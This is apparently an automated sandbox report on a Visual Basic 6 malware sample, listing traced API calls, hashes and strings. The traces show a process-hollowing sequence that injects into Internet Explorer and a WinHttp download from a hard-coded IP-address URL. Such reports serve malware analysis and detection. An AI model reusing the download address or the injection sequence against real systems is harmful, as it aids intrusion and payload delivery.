              • API ID: Process$MemoryThreadWrite$ContextWow64$AllocCreateResumeSectionUnmapViewVirtual
              • String ID:
              • API String ID: 2814188497-0
              • Opcode ID: d0a520da038f78ebec625752577e7c22bb10c8cb382cc48eb6918541cba08716
              • Instruction ID: c3702764d6fd89d2e77c17cc86f4299bc32cbc81b52d42fa1125811c9ba69355
              • Opcode Fuzzy Hash: d0a520da038f78ebec625752577e7c22bb10c8cb382cc48eb6918541cba08716
              • Instruction Fuzzy Hash: 941249B55493C06FEB0267B0CC26F653F209F87708F1A41EFA5809E6E3C66D5816C726
              APIs
              • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 004943BF
              • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 004943EA
              • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 00494421
              • WriteProcessMemory.KERNELBASE ref: 0049446F
              • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 00494555
              • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 004945AD
              • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 004945F9
              • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 00494644
              • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 00494664
              Memory Dump Source
              • Source File: 00000000.00000003.1239052882.000000000048B000.00000004.00000020.00020000.00000000.sdmp, Offset: 0048D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_3_48b000_1vQ6RSHmz5.jbxd
              Similarity
              • API ID: Process$MemoryThreadWrite$ContextWow64$AllocCreateResumeSectionUnmapViewVirtual
              • String ID:
              • API String ID: 2814188497-0
              • Opcode ID: d0a520da038f78ebec625752577e7c22bb10c8cb382cc48eb6918541cba08716
              • Instruction ID: c3702764d6fd89d2e77c17cc86f4299bc32cbc81b52d42fa1125811c9ba69355
              • Opcode Fuzzy Hash: d0a520da038f78ebec625752577e7c22bb10c8cb382cc48eb6918541cba08716
              • Instruction Fuzzy Hash: 941249B55493C06FEB0267B0CC26F653F209F87708F1A41EFA5809E6E3C66D5816C726
              APIs
              • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 004943BF
              • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 004943EA
              • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 00494421
              • WriteProcessMemory.KERNELBASE ref: 0049446F
              • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 00494555
              • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 004945AD
              • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 004945F9
              • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 00494644
              • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 00494664
              Memory Dump Source
              • Source File: 00000000.00000003.1239052882.000000000048B000.00000004.00000020.00020000.00000000.sdmp, Offset: 0048B000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_3_48b000_1vQ6RSHmz5.jbxd
              Similarity
              • API ID: Process$MemoryThreadWrite$ContextWow64$AllocCreateResumeSectionUnmapViewVirtual
              • String ID:
              • API String ID: 2814188497-0
              • Opcode ID: 65e87b5262983bead1c5ac08423a2c87dc1ec0f7a0c424fb6839640a6beb8085
              • Instruction ID: 1d7bb98249f058682284c6a50a531560b5becea1c1d0840a34d5e4e6bb95fe7c
              • Opcode Fuzzy Hash: 65e87b5262983bead1c5ac08423a2c87dc1ec0f7a0c424fb6839640a6beb8085
              • Instruction Fuzzy Hash: F7026AB55493C06FDB0267B0CC56F663F205F87708F1A41EFA5809E6E3C6AD5816C726
              APIs
              • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 004943BF
              • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 004943EA
              • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 00494421
              • WriteProcessMemory.KERNELBASE ref: 0049446F
              • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 00494555
              • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 004945AD
              • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 004945F9
              • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 00494644
              • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 00494664
              Memory Dump Source
              • Source File: 00000000.00000003.1239052882.000000000048B000.00000004.00000020.00020000.00000000.sdmp, Offset: 0048D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_3_48b000_1vQ6RSHmz5.jbxd
              Similarity
              • API ID: Process$MemoryThreadWrite$ContextWow64$AllocCreateResumeSectionUnmapViewVirtual
              • String ID:
              • API String ID: 2814188497-0
              • Opcode ID: 65e87b5262983bead1c5ac08423a2c87dc1ec0f7a0c424fb6839640a6beb8085
              • Instruction ID: 1d7bb98249f058682284c6a50a531560b5becea1c1d0840a34d5e4e6bb95fe7c
              • Opcode Fuzzy Hash: 65e87b5262983bead1c5ac08423a2c87dc1ec0f7a0c424fb6839640a6beb8085
              • Instruction Fuzzy Hash: F7026AB55493C06FDB0267B0CC56F663F205F87708F1A41EFA5809E6E3C6AD5816C726

              Control-flow Graph

              APIs
              • __vbaStrCopy.MSVBVM60(?,6D7F4600), ref: 004034E4
                • Part of subcall function 004038D0: __vbaStrCopy.MSVBVM60(?,6D7F4600), ref: 00403916
                • Part of subcall function 004038D0: __vbaStrCopy.MSVBVM60(?,6D7F4600), ref: 00403920
                • Part of subcall function 004038D0: __vbaLenBstr.MSVBVM60(?,?,6D7F4600), ref: 00403926
                • Part of subcall function 004038D0: #631.MSVBVM60(?,?,?,?,6D7F4600), ref: 0040395A
                • Part of subcall function 004038D0: __vbaStrMove.MSVBVM60(?,6D7F4600), ref: 00403965
                • Part of subcall function 004038D0: #516.MSVBVM60(00000000,?,6D7F4600), ref: 00403968
                • Part of subcall function 004038D0: __vbaFreeStr.MSVBVM60(?,6D7F4600), ref: 0040397A
                • Part of subcall function 004038D0: __vbaFreeVar.MSVBVM60(?,6D7F4600), ref: 00403983
                • Part of subcall function 004038D0: #537.MSVBVM60(00000000,?,?,6D7F4600), ref: 00403994
                • Part of subcall function 004038D0: __vbaStrMove.MSVBVM60(?,6D7F4600), ref: 0040399F
                • Part of subcall function 004038D0: __vbaStrCat.MSVBVM60(00000000,?,6D7F4600), ref: 004039A2
                • Part of subcall function 004038D0: __vbaStrMove.MSVBVM60(?,6D7F4600), ref: 004039AD
                • Part of subcall function 004038D0: __vbaFreeStr.MSVBVM60(?,6D7F4600), ref: 004039B2
                • Part of subcall function 004038D0: __vbaStrCopy.MSVBVM60(?,6D7F4600), ref: 004039CE
                • Part of subcall function 004038D0: __vbaFreeStr.MSVBVM60(00403A0E,?,6D7F4600), ref: 00403A06
                • Part of subcall function 004038D0: __vbaFreeStr.MSVBVM60(?,6D7F4600), ref: 00403A0B
              • __vbaVarMove.MSVBVM60(00401AAC,?,6D7F4600), ref: 0040350B
              • __vbaVarCat.MSVBVM60(?,?,?,00401E9C,?,6D7F4600), ref: 0040352F
              • __vbaVarMove.MSVBVM60(?,6D7F4600), ref: 00403536
              • __vbaFreeVar.MSVBVM60(?,6D7F4600), ref: 00403541
              • __vbaVarCat.MSVBVM60(?,?,?,,?,6D7F4600), ref: 00403563
              • __vbaVarMove.MSVBVM60(?,6D7F4600), ref: 0040356A
              • __vbaFreeVar.MSVBVM60(?,6D7F4600), ref: 0040356F
              • __vbaVarCat.MSVBVM60(?,00000008,?,,?,6D7F4600), ref: 00403591
              • __vbaVarMove.MSVBVM60(?,6D7F4600), ref: 00403598
              • __vbaFreeVar.MSVBVM60(?,6D7F4600), ref: 0040359D
              • __vbaVarCat.MSVBVM60(?,00000008,?,00402A6C,?,6D7F4600), ref: 004035BF
              • __vbaVarMove.MSVBVM60(?,6D7F4600), ref: 004035C6
              • __vbaFreeVar.MSVBVM60(?,6D7F4600), ref: 004035CB
              • __vbaVarCat.MSVBVM60(?,00000008,?,: ,?,6D7F4600), ref: 004035ED
              • __vbaVarMove.MSVBVM60(?,6D7F4600), ref: 004035F4
              • __vbaFreeVar.MSVBVM60(?,6D7F4600), ref: 004035F9
              • __vbaLenVar.MSVBVM60(00000008,?,00000000,?,6D7F4600), ref: 00403629
              • __vbaVarIdiv.MSVBVM60(?,?,00000000,?,6D7F4600), ref: 00403637
              • __vbaVarSub.MSVBVM60(?,?,00000000,?,6D7F4600), ref: 00403649
              • __vbaI4Var.MSVBVM60(00000000,?,6D7F4600), ref: 00403656
              • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,?,6D7F4600), ref: 00403668
              • __vbaLenVar.MSVBVM60(00000008,?), ref: 00403679
              • __vbaI4Var.MSVBVM60(00000000), ref: 0040367C
              • __vbaGenerateBoundsError.MSVBVM60 ref: 004036C8
              • __vbaGenerateBoundsError.MSVBVM60 ref: 004036DC
              • __vbaStrVarVal.MSVBVM60(?,?,?,00000008,00402EFC), ref: 004036FA
              • #631.MSVBVM60(00000000), ref: 00403701
              • __vbaStrMove.MSVBVM60 ref: 0040370C
              • __vbaStrCat.MSVBVM60(00000000), ref: 0040370F
              • __vbaStrMove.MSVBVM60 ref: 0040371A
              • __vbaUI1Str.MSVBVM60(00000000), ref: 0040371D
              • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00403740
              • __vbaFreeVar.MSVBVM60 ref: 0040374C
              • __vbaAryLock.MSVBVM60(?,?), ref: 00403779
              • __vbaGenerateBoundsError.MSVBVM60 ref: 00403798
              • __vbaGenerateBoundsError.MSVBVM60 ref: 004037A5
              • #644.MSVBVM60(00401176), ref: 004037BA
              • __vbaAryUnlock.MSVBVM60(?), ref: 004037C8
              • #644.MSVBVM60(?), ref: 004037CE
              • __vbaAryLock.MSVBVM60(?,00000000), ref: 004037E4
              • __vbaGenerateBoundsError.MSVBVM60 ref: 00403809
              • __vbaGenerateBoundsError.MSVBVM60 ref: 0040381A
              • #644.MSVBVM60(00401176), ref: 00403829
              • __vbaAryUnlock.MSVBVM60(?), ref: 00403831
              • CallWindowProcW.USER32(00000000,?,00000000,00000000,00000000), ref: 00403845
              • __vbaAryDestruct.MSVBVM60(00000000,?,004038AF), ref: 00403896
              • __vbaFreeStr.MSVBVM60 ref: 0040389F
              • __vbaFreeVar.MSVBVM60 ref: 004038A8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1240769359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.1240757536.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1240782790.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1240796321.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_1vQ6RSHmz5.jbxd
              Similarity
              • API ID: __vba$Free$Move$BoundsErrorGenerate$Copy$#644$#631LockUnlock$#516#537BstrCallDestructIdivListProcRedimWindow
              • String ID: : $$
              • API String ID: 2528383739-1098526621
              • Opcode ID: 9cb00605a9a403a810bc6a965bb311add23c758bed5638cbeb31140c2c713c48
              • Instruction ID: e3070fd3b8c95cc344ef94ed2f64778bf3fd8cdb0143141e249bdc52bf3f5224
              • Opcode Fuzzy Hash: 9cb00605a9a403a810bc6a965bb311add23c758bed5638cbeb31140c2c713c48
              • Instruction Fuzzy Hash: C2D12EB1D00219AFCB14DFA4DD84AEEBBB9FF48301F10816AE506B7290EB746A45CF55

              Control-flow Graph

              APIs
              • #716.MSVBVM60(?,WinHttp.WinHttpRequest.5.1,00000000,?,00000000,00000000), ref: 004031EA
              • __vbaObjVar.MSVBVM60(?), ref: 004031F4
              • __vbaObjSetAddref.MSVBVM60(?,00000000), ref: 004031FF
              • __vbaFreeVar.MSVBVM60 ref: 0040320E
              • __vbaLateMemCall.MSVBVM60(?,Open,00000003), ref: 00403282
              • __vbaLateMemCall.MSVBVM60(?,Send,00000000), ref: 0040328E
              • __vbaLateMemCallLd.MSVBVM60(?,?,Status,00000000), ref: 004032AF
              • __vbaVarTstEq.MSVBVM60(00008002,00000000), ref: 004032BD
              • __vbaFreeVar.MSVBVM60 ref: 004032C8
              • __vbaLateMemCallLd.MSVBVM60(?,?,ResponseBody,00000000), ref: 004032DD
              • __vbaVar2Vec.MSVBVM60(?,00000000), ref: 004032EB
              • __vbaAryMove.MSVBVM60(?,?), ref: 004032F9
              • __vbaFreeVar.MSVBVM60 ref: 00403302
              • __vbaFreeObj.MSVBVM60(0040334B), ref: 00403344
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1240769359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.1240757536.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1240782790.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1240796321.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_1vQ6RSHmz5.jbxd
              Similarity
              • API ID: __vba$CallFreeLate$#716AddrefMoveVar2
              • String ID: GET$Open$ResponseBody$Send$Status$WinHttp.WinHttpRequest.5.1
              • API String ID: 4236265258-635870661
              • Opcode ID: a0225d0982a31788d259535e62ea63b5dd68e41a49e70ecd0eb76925af1a1562
              • Instruction ID: 05b94fc137fc67dce4c4a8f7f089be65859327c1584e472d7d36f5312e05b1ea
              • Opcode Fuzzy Hash: a0225d0982a31788d259535e62ea63b5dd68e41a49e70ecd0eb76925af1a1562
              • Instruction Fuzzy Hash: F94140B4D00209DFDB14DFA9C984AAEBBB8FF48700F10C52AE519B7291D7759906CF94

              Control-flow Graph

              APIs
              • __vbaStrCopy.MSVBVM60 ref: 004033B9
                • Part of subcall function 004031A0: #716.MSVBVM60(?,WinHttp.WinHttpRequest.5.1,00000000,?,00000000,00000000), ref: 004031EA
                • Part of subcall function 004031A0: __vbaObjVar.MSVBVM60(?), ref: 004031F4
                • Part of subcall function 004031A0: __vbaObjSetAddref.MSVBVM60(?,00000000), ref: 004031FF
                • Part of subcall function 004031A0: __vbaFreeVar.MSVBVM60 ref: 0040320E
                • Part of subcall function 004031A0: __vbaLateMemCall.MSVBVM60(?,Open,00000003), ref: 00403282
                • Part of subcall function 004031A0: __vbaLateMemCall.MSVBVM60(?,Send,00000000), ref: 0040328E
                • Part of subcall function 004031A0: __vbaLateMemCallLd.MSVBVM60(?,?,Status,00000000), ref: 004032AF
                • Part of subcall function 004031A0: __vbaVarTstEq.MSVBVM60(00008002,00000000), ref: 004032BD
                • Part of subcall function 004031A0: __vbaFreeVar.MSVBVM60 ref: 004032C8
              • __vbaAryMove.MSVBVM60(00404010,?,?), ref: 004033DA
              • #558.MSVBVM60(?), ref: 004033EE
              • __vbaAryMove.MSVBVM60(00404014,?,00404010,0000000D), ref: 00403413
                • Part of subcall function 00403450: __vbaStrCopy.MSVBVM60(0040341A), ref: 0040345A
              • __vbaAryDestruct.MSVBVM60(00000000,?,0040343F), ref: 0040342C
              • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00403433
              • __vbaFreeStr.MSVBVM60 ref: 00403438
                • Part of subcall function 00403020: __vbaLbound.MSVBVM60(00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00401176), ref: 0040305F
                • Part of subcall function 00403020: __vbaUbound.MSVBVM60(00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00401176), ref: 0040306D
                • Part of subcall function 00403020: __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,?,00000000), ref: 0040307F
                • Part of subcall function 00403020: __vbaUbound.MSVBVM60(00000001,00000000), ref: 0040308D
                • Part of subcall function 00403020: __vbaLbound.MSVBVM60(00000001), ref: 00403097
                • Part of subcall function 00403020: __vbaGenerateBoundsError.MSVBVM60 ref: 004030C0
                • Part of subcall function 00403020: __vbaGenerateBoundsError.MSVBVM60 ref: 004030CB
                • Part of subcall function 00403020: __vbaGenerateBoundsError.MSVBVM60 ref: 004030EF
                • Part of subcall function 00403020: __vbaUI1I2.MSVBVM60 ref: 0040312B
              Strings
              • http://176.223.134.190/x/re.txt, xrefs: 0040339B
              Memory Dump Source
              • Source File: 00000000.00000002.1240769359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.1240757536.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1240782790.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1240796321.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_1vQ6RSHmz5.jbxd
              Similarity
              • API ID: __vba$BoundsCallErrorFreeGenerateLate$CopyDestructLboundMoveUbound$#558#716AddrefRedim
              • String ID: http://176.223.134.190/x/re.txt
              • API String ID: 2783785641-1962942717
              • Opcode ID: fafa7730b5d348f9e6e99a8b06a0e769eea22b0b596ab635cbe2d589f4dfced4
              • Instruction ID: 69f5f77bd2acd0798f39f69db5f2b53043d0465c6871404007e87d74e1a400fa
              • Opcode Fuzzy Hash: fafa7730b5d348f9e6e99a8b06a0e769eea22b0b596ab635cbe2d589f4dfced4
              • Instruction Fuzzy Hash: BC2121B5C10219ABDB00DFA4DD45ADEBBBCEF48705F10812AE600B7290D7781645CFA9

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 51 403450-403470 __vbaStrCopy call 403480
              APIs
              • __vbaStrCopy.MSVBVM60(0040341A), ref: 0040345A
                • Part of subcall function 00403480: __vbaStrCopy.MSVBVM60(?,6D7F4600), ref: 004034E4
                • Part of subcall function 00403480: __vbaVarMove.MSVBVM60(00401AAC,?,6D7F4600), ref: 0040350B
                • Part of subcall function 00403480: __vbaVarCat.MSVBVM60(?,?,?,00401E9C,?,6D7F4600), ref: 0040352F
                • Part of subcall function 00403480: __vbaVarMove.MSVBVM60(?,6D7F4600), ref: 00403536
                • Part of subcall function 00403480: __vbaFreeVar.MSVBVM60(?,6D7F4600), ref: 00403541
                • Part of subcall function 00403480: __vbaVarCat.MSVBVM60(?,?,?,,?,6D7F4600), ref: 00403563
                • Part of subcall function 00403480: __vbaVarMove.MSVBVM60(?,6D7F4600), ref: 0040356A
                • Part of subcall function 00403480: __vbaFreeVar.MSVBVM60(?,6D7F4600), ref: 0040356F
                • Part of subcall function 00403480: __vbaVarCat.MSVBVM60(?,00000008,?,,?,6D7F4600), ref: 00403591
                • Part of subcall function 00403480: __vbaVarMove.MSVBVM60(?,6D7F4600), ref: 00403598
                • Part of subcall function 00403480: __vbaFreeVar.MSVBVM60(?,6D7F4600), ref: 0040359D
              Strings
              • C:\Program Files (x86)\Internet Explorer\iexplore.exe, xrefs: 00403450
              Memory Dump Source
              • Source File: 00000000.00000002.1240769359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.1240757536.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1240782790.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1240796321.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_1vQ6RSHmz5.jbxd
              Similarity
              • API ID: __vba$Move$Free$Copy
              • String ID: C:\Program Files (x86)\Internet Explorer\iexplore.exe
              • API String ID: 129593142-908218840
              • Opcode ID: bf32827f30bc769fedb35afbe923f82f350ed977f3c5feea6e7f12cddedaf65b
              • Instruction ID: bc980b9d061f33b470efba7fc0a77275068817bac15f6abe3874c4cc98695366
              • Opcode Fuzzy Hash: bf32827f30bc769fedb35afbe923f82f350ed977f3c5feea6e7f12cddedaf65b
              • Instruction Fuzzy Hash: F6C09BB661014057C7107F549D05455265997C8345351C4377705B75F1C63C864556AC

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 54 401310-401330 #100
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1240769359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.1240757536.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1240782790.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1240796321.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_1vQ6RSHmz5.jbxd
              Similarity
              • API ID: #100
              • String ID:
              • API String ID: 1341478452-0
              • Opcode ID: 3c94f5272c14347b538452884a11f4d4223fdf55e04befecbfe8adfe609341dd
              • Instruction ID: ab442d5cb029f8d99fbeaa4926735bf4cb79f884fdf82a7ed6b98b16345f9b98
              • Opcode Fuzzy Hash: 3c94f5272c14347b538452884a11f4d4223fdf55e04befecbfe8adfe609341dd
              • Instruction Fuzzy Hash: C7D0A4A189E3C04EEB035BB669A11053FB05E1361130B00EBD880EE8EBC0AC4809CB37
              APIs
              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,004942DB,0000003C,0000001E,0000004A,0000003E,0048F2F1), ref: 00494697
              Memory Dump Source
              • Source File: 00000000.00000003.1239052882.000000000048B000.00000004.00000020.00020000.00000000.sdmp, Offset: 0048B000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_3_48b000_1vQ6RSHmz5.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
              • Instruction ID: 0b109c6521def8d881b17f5f05ea3bff1a1e8d599f4b7692d097916e10e06628
              • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
              • Instruction Fuzzy Hash: 3BD0A7B018430025E9017B72CC03F5829809FC1746F400419B304281E1C6AD4826011E
              APIs
              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,004942DB,0000003C,0000001E,0000004A,0000003E,0048F2F1), ref: 00494697
              Memory Dump Source
              • Source File: 00000000.00000003.1239052882.000000000048B000.00000004.00000020.00020000.00000000.sdmp, Offset: 0048D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_3_48b000_1vQ6RSHmz5.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
              • Instruction ID: 0b109c6521def8d881b17f5f05ea3bff1a1e8d599f4b7692d097916e10e06628
              • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
              • Instruction Fuzzy Hash: 3BD0A7B018430025E9017B72CC03F5829809FC1746F400419B304281E1C6AD4826011E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000003.1239052882.000000000048B000.00000004.00000020.00020000.00000000.sdmp, Offset: 0048B000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_3_48b000_1vQ6RSHmz5.jbxd
              Similarity
              • API ID:
              • String ID: I$I$I
              • API String ID: 0-1026710417
              • Opcode ID: 02a05e2c7a4da98787b32dbd5e9dbcb4b345314bef90af90a4526a44edc0eed1
              • Instruction ID: ae46e2560248ab8d116350ffa860fe91c82f4918234ee8ad44592a0c4e7b0a0e
              • Opcode Fuzzy Hash: 02a05e2c7a4da98787b32dbd5e9dbcb4b345314bef90af90a4526a44edc0eed1
              • Instruction Fuzzy Hash: 0B8366914AEBD05FEB1B9334096E594BF11AE2336875E42EFC1904F1E3DA4E850BC31A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000003.1239052882.000000000048B000.00000004.00000020.00020000.00000000.sdmp, Offset: 0048D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_3_48b000_1vQ6RSHmz5.jbxd
              Similarity
              • API ID:
              • String ID: I$I$I
              • API String ID: 0-1026710417
              • Opcode ID: 02a05e2c7a4da98787b32dbd5e9dbcb4b345314bef90af90a4526a44edc0eed1
              • Instruction ID: ae46e2560248ab8d116350ffa860fe91c82f4918234ee8ad44592a0c4e7b0a0e
              • Opcode Fuzzy Hash: 02a05e2c7a4da98787b32dbd5e9dbcb4b345314bef90af90a4526a44edc0eed1
              • Instruction Fuzzy Hash: 0B8366914AEBD05FEB1B9334096E594BF11AE2336875E42EFC1904F1E3DA4E850BC31A

              Control-flow Graph

              APIs
              • __vbaStrCopy.MSVBVM60(?,6D7F4600), ref: 00403916
              • __vbaStrCopy.MSVBVM60(?,6D7F4600), ref: 00403920
              • __vbaLenBstr.MSVBVM60(?,?,6D7F4600), ref: 00403926
              • #631.MSVBVM60(?,?,?,?,6D7F4600), ref: 0040395A
              • __vbaStrMove.MSVBVM60(?,6D7F4600), ref: 00403965
              • #516.MSVBVM60(00000000,?,6D7F4600), ref: 00403968
              • __vbaFreeStr.MSVBVM60(?,6D7F4600), ref: 0040397A
              • __vbaFreeVar.MSVBVM60(?,6D7F4600), ref: 00403983
              • #537.MSVBVM60(00000000,?,?,6D7F4600), ref: 00403994
              • __vbaStrMove.MSVBVM60(?,6D7F4600), ref: 0040399F
              • __vbaStrCat.MSVBVM60(00000000,?,6D7F4600), ref: 004039A2
              • __vbaStrMove.MSVBVM60(?,6D7F4600), ref: 004039AD
              • __vbaFreeStr.MSVBVM60(?,6D7F4600), ref: 004039B2
              • __vbaStrCopy.MSVBVM60(?,6D7F4600), ref: 004039CE
              • __vbaFreeStr.MSVBVM60(00403A0E,?,6D7F4600), ref: 00403A06
              • __vbaFreeStr.MSVBVM60(?,6D7F4600), ref: 00403A0B
              • __vbaErrorOverflow.MSVBVM60(?,6D7F4600), ref: 00403A24
              Memory Dump Source
              • Source File: 00000000.00000002.1240769359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.1240757536.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1240782790.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1240796321.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_1vQ6RSHmz5.jbxd
              Similarity
              • API ID: __vba$Free$CopyMove$#516#537#631BstrErrorOverflow
              • String ID:
              • API String ID: 631378321-0
              • Opcode ID: e7e802f124037a690ded69415dd299caf99761b984c89ed951d0d68b79bca2c3
              • Instruction ID: f4c441831863617f3d2ae5bce2dbd206419bbca2f16f784a56f5f34d5d435a97
              • Opcode Fuzzy Hash: e7e802f124037a690ded69415dd299caf99761b984c89ed951d0d68b79bca2c3
              • Instruction Fuzzy Hash: 6F310A75D002589FCB05DFA4DD88ADDBBB8EB5C701F10812AE446B32A4EB785945CFA4

              Control-flow Graph

              APIs
              • __vbaLbound.MSVBVM60(00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00401176), ref: 0040305F
